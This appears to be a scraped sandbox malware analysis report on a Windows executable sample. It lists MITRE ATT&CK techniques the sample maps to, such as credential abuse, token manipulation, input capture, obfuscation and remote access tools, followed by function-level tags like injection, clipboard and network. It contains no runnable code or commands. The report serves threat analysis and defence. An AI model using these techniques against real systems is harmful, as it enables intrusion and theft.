Opcode ID: d04aef97d035244799662fa1aea145fd7b02c311b4b25832fa72f04e93b0ca42
Instruction ID: 69d95d11ad96412be80f573ec36b351f8c0b905190464251c5bce2533d94b870
Opcode Fuzzy Hash: d04aef97d035244799662fa1aea145fd7b02c311b4b25832fa72f04e93b0ca42
Instruction Fuzzy Hash: 55F058747903219BDB24AB22BD08B8A3664BB01761FC8022AF401E72B0C7B88802C74D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 7FzERy9xWc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: 7FzERy9xWc.exe PID: 2788 Parent PID: 5724

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: 7FzERy9xWc.exe PID: 2788 Parent PID: 5724 7FzERy9xWc.exeCOMMON

Executed Functions

Function 00409D89, Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 235
sleepmemoryCOMMON

Function 00415510, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
COMMON

Function 0041CAF0, Relevance: 9.1, APIs: 6, Instructions: 105
memorynetworkCOMMON

Function 00416D20, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
COMMON

Function 0041DD30, Relevance: 9.1, APIs: 6, Instructions: 79
sleepCOMMON

Function 0041E910, Relevance: 84.4, APIs: 28, Strings: 20, Instructions: 425
libraryloaderwindowCOMMON

Function 0041D940, Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 292
synchronizationsleepmemoryCOMMON

Function 0041A850, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 292
stringmemorynetworkCOMMON

Function 0040AC10, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 337
registryCOMMONCrypto

Function 00408E30, Relevance: 30.8, APIs: 20, Instructions: 760
memorynetworkCOMMONCrypto

Function 0040FEA0, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 261
libraryloaderCOMMON

Function 00406D40, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 151
networkCOMMON

Function 00416AB0, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 180
registryCOMMONCrypto

Function 00412C70, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 99
libraryloaderprocessCOMMON

Function 00418700, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144
sleepfilesynchronizationCOMMON

Function 004185D0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 95
fileCOMMON

Function 004232A0, Relevance: 16.6, APIs: 11, Instructions: 148
encryptionmemorytimeCOMMON

Function 00423840, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 119
windowsynchronizationCOMMON

Function 0041FB50, Relevance: 13.7, APIs: 9, Instructions: 202
memoryencryptionCOMMON

Function 0041A370, Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Function 00414F40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76
networkCOMMON

Function 004129B0, Relevance: 10.6, APIs: 7, Instructions: 55
threadCOMMON

Function 00417150, Relevance: 9.1, APIs: 6, Instructions: 117
memoryinjectionCOMMON

Function 004239D0, Relevance: 9.1, APIs: 6, Instructions: 67
synchronizationclipboardCOMMON

Function 0040C999, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123
memoryCOMMON

Function 0040E230, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
shutdownCOMMON

Function 00412930, Relevance: 6.0, APIs: 4, Instructions: 45
threadprocessCOMMON

Function 00420440, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189
commemoryCOMMON

Function 004234C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
timeCOMMON

Function 0041D000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87
COMMON

Function 00416E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82
COMMONCrypto

Function 0041B6E0, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 342
COMMON

Function 0041AC10, Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 342
synchronizationthreadCOMMON

Function 00407050, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 218
synchronizationnetworkCOMMON

Function 00426210, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224
fileregistrymemoryCOMMON

Function 00424ED0, Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 483
memorysynchronizationnetworkCOMMON

Function 00407188, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 118
networksynchronizationthreadCOMMON

Function 00428230, Relevance: 31.7, APIs: 21, Instructions: 241
memoryprocessCOMMON

Function 00408900, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 318
synchronizationCOMMON

Function 00425D90, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 211
networkmemoryCOMMON

Function 0041C530, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 101
COMMON

Function 0040CEE0, Relevance: 25.8, APIs: 17, Instructions: 254
synchronizationmemorystringCOMMON

Function 004101F0, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212
synchronizationCOMMON

Function 0041DFE0, Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 232
COMMON

Function 0040B920, Relevance: 22.7, APIs: 15, Instructions: 209
memorynetworkCOMMON

Function 00426A90, Relevance: 22.6, APIs: 15, Instructions: 145
windowCOMMON

Function 004278B0, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 338
synchronizationwindowthreadCOMMON

Function 0040B560, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 137
memorynetworkCOMMON

Function 0041BEB0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123
synchronizationmemoryCOMMON

Function 0040EB40, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 110
synchronizationregistrythreadCOMMON

Function 004264F0, Relevance: 21.1, APIs: 14, Instructions: 93
filesynchronizationthreadCOMMON

Function 00415F00, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 0041C0F0, Relevance: 19.6, APIs: 13, Instructions: 141
synchronizationthreadwindowCOMMON

Function 004275A0, Relevance: 18.2, APIs: 12, Instructions: 248
windowthreadtimeCOMMON